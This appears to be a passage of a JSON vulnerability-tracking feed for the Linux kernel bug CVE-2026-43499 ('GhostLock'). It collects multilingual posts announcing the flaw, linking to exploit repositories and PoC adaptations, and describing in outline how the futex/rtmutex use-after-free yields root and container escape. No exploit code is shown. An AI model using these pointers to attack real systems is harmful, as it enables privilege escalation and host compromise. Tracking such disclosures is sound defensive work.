\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2026-07-13T15:00:04.516332Z"}, {"uuid": "4b968e38-62d3-453a-95f0-3699b7c3b49b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/pentest-tools.com/post/3mqk2bg5nrc22", "content": "GhostLock (CVE-2026-43499): a use-after-free in the Linux kernel, shipped by default since 2011 and disclosed this week. Any logged-in user gets full root in about 5 seconds. And it escapes containers, so it runs as root on the host. \nwww.itpro.com/software/lin...", "creation_timestamp": "2026-07-13T15:51:12.563408Z"}, {"uuid": "1f5995aa-eac0-40bf-b51a-28e7ba997f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/387", "content": "GhostLock \u2014 CVE-2026-43499\n\nThis is a Linux kernel vulnerability found by\u00a0VEGA\u00a0that exists in every major distribution since 2011. Triggering the bug does not require any special kernel config or privilege. By turning it into a 97% stable privilege escalation and container escape, Google has rewarded us $92,337 in kernelCTF. This writeup covers the technical details of the exploit.\n\n\ud83d\udd17 Research:\nhttps://nebusec.ai/research/ionstack-part-2/\n\n\ud83d\udd17 Exploit:\nhttps://github.com/NebuSec/CyberMeowfia/tree/main/IonStack/CVE-2026-43499\n\n#linux #kernel #lpe #container #escape", "creation_timestamp": "2026-07-13T22:00:03.708964Z"}, {"uuid": "00ad2172-47fd-4dd7-bd98-2b9c8ba35e83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93191", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-pgem10-ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Thiasap\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-13 07:36:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nOPPO Find X6 Pro GhostLock (CVE-2026-43499) exploit adaptation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:03.755126Z"}, {"uuid": "1f93de7a-2bda-4709-8fda-087e89f490c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/92743", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pubglite55\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 22:57:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nOPPO Find N2 GhostLock (CVE-2026-43499) exploit adaptation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:05.975330Z"}, {"uuid": "2f180504-7506-4ada-8678-942ded5af47f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/92587", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #\u6f0f\u6d1e\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-armv7\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a tc3650\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 00:41:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:07.054883Z"}, {"uuid": "dfe8a4f7-1f17-49b0-9eea-23453b2583b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/90796", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MobiusM\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-27 05:05:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:18.053863Z"}, {"uuid": "0cd655d5-8c63-4d1a-a9ed-5e0de84e131a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/geeknewsbot.bsky.social/post/3mqksaq7j7n2b", "content": "GhostLock, 15\ub144\uac04 \ubaa8\ub4e0 Linux \ubc30\ud3ec\ud310\uc5d0 \uc874\uc7ac\ud55c \uc2a4\ud0dd UAF\n\nGhostLock(CVE-2026-43499) \uc740 Linux 2.6.39\uc5d0 \ub3c4\uc785\ub3fc 7.1\uc5d0\uc11c \uc218\uc815\ub41c \ucee4\ub110 \ucde8\uc57d\uc810\uc73c\ub85c, \ube44\ud2b9\uad8c \ub85c\uceec \uacf5\uaca9\uc790\uac00 \uc77c\ubc18\uc801\uc778 \uc2a4\ub808\ub529 \uc2dc\uc2a4\ud15c \ud638\ucd9c\ub9cc\uc73c\ub85c \uc2a4\ud0dd UAF\ub97c \uc77c\uc73c\ucf1c \ub8e8\ud2b8 \uad8c\ud55c \ud68d\ub4dd\uacfc \ucee8\ud14c\uc774\ub108 \ud0c8\ucd9c \uc5d0 \uc774\uc6a9\ud560 \uc218 \uc788\uc74c Requeue-PI \ud504\ub85d\uc2dc \uacbd\ub85c\uc758 remove_wai...", "creation_timestamp": "2026-07-13T23:00:11.055966Z"}, {"uuid": "c38f842a-a5b1-46b0-afa2-6b1bcd100369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/Dr5t3AWmhNxHtW6q-vVADHq8j4ahaU0CPtmbuUWAbez-NA", "content": "", "creation_timestamp": "2026-07-14T00:00:06.651558Z"}, {"uuid": "e4e90fdf-876e-4150-85ff-a922e976413e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/Cr3wALFZfb610mv1uphOTC6B9r8adn_Xd1An_hCUvMHm7w", "content": "", "creation_timestamp": "2026-07-14T00:00:06.737157Z"}, {"uuid": "3e0f9d92-27b7-44d8-b8b5-1e4cc77680cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/92587", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #\u6f0f\u6d1e\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-armv7\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a tc3650\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 00:41:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:10.304674Z"}, {"uuid": "8736d26c-5402-4807-9f64-533d2118054b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93191", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-pgem10-ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Thiasap\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-13 07:36:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nOPPO Find X6 Pro GhostLock (CVE-2026-43499) exploit adaptation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:09.081152Z"}, {"uuid": "335742af-a711-4040-a05f-5b3a09c6a754", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/92743", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pubglite55\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 22:57:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nOPPO Find N2 GhostLock (CVE-2026-43499) exploit adaptation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:09.416720Z"}, {"uuid": "e375337c-961c-4bd7-a2fd-d3b4bbf1fa3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/387", "content": "GhostLock \u2014 CVE-2026-43499\n\nThis is a Linux kernel vulnerability found by\u00a0VEGA\u00a0that exists in every major distribution since 2011. Triggering the bug does not require any special kernel config or privilege. By turning it into a 97% stable privilege escalation and container escape, Google has rewarded us $92,337 in kernelCTF. This writeup covers the technical details of the exploit.\n\n\ud83d\udd17 Research:\nhttps://nebusec.ai/research/ionstack-part-2/\n\n\ud83d\udd17 Exploit:\nhttps://github.com/NebuSec/CyberMeowfia/tree/main/IonStack/CVE-2026-43499\n\n#linux #kernel #lpe #container #escape", "creation_timestamp": "2026-07-14T00:00:09.127482Z"}, {"uuid": "232b5eb6-7a7f-48df-935e-84a5c4575d94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/8401", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u043e\u043b\u0435\u0435 15 \u043b\u0435\u0442, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-43499 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 GhostLock. \u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0438 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432.\n\n\u0417\u0430 \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Nebula Security \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u043c\u0435\u0440\u0435 92 337 \u0434\u043e\u043b\u043b. \u043f\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 kernelCTF \u043e\u0442 Google.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u043e\u0448\u0438\u0431\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0441\u043f\u0435\u0445\u0430 \u0432 97%. GhostLock \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432 Linux 2.6.39 \u0432 2011 \u0433\u043e\u0434\u0443 \u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432 \u044f\u0434\u0440\u0435 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u044b\u043b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u0432 Linux 7.1, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432 \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nGhostLock \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (rtmutex) \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043e\u0432 futex.\n\n\u0418\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u044f\u0434\u0440\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0432\u0438\u0441\u044f\u0447\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u0432 \u0441\u0442\u0435\u043a\u0435 \u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u044d\u0442\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0434\u0438\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0425\u043e\u0442\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 Nebula Security \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0435\u0440\u0435\u0434\u043e\u0432\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u044f\u0434\u0440\u0430 \u0438 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043b\u0435\u0436\u0430\u0449\u0430\u044f \u0432 \u0435\u0433\u043e \u043e\u0441\u043d\u043e\u0432\u0435 \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430.\n\n\u0412\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0436\u0435 \u0431\u044b\u043b\u0430 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0434\u0440\u0443\u0433\u043e\u043c, \u0433\u0434\u0435 \u043e\u043d\u0430 \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u044f\u0434\u0440\u0430.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 GhostLock \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438, \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043b\u0438 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u044f\u0434\u0440\u0430.\n\n\u0421\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u0435\u0441\u043b\u0438 \u0432 \u043d\u0435\u0439 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 CONFIG_FUTEX_PI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u044b\u0445 \u044f\u0434\u0435\u0440 Linux.\n\n\u041e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0438 18 \u0430\u043f\u0440\u0435\u043b\u044f 2026 \u0433\u043e\u0434\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c. \u0414\u0440\u0443\u0433\u043e\u0439 \u043f\u0430\u0442\u0447, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0431\u044b\u043b \u043f\u0440\u0438\u043d\u044f\u0442 \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f, \u0438 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0440\u0430.\n\nGoogle \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 Nebula Security \u0432 kernelCTF 30 \u0438\u044e\u043d\u044f, \u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0441\u0432\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0441\u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 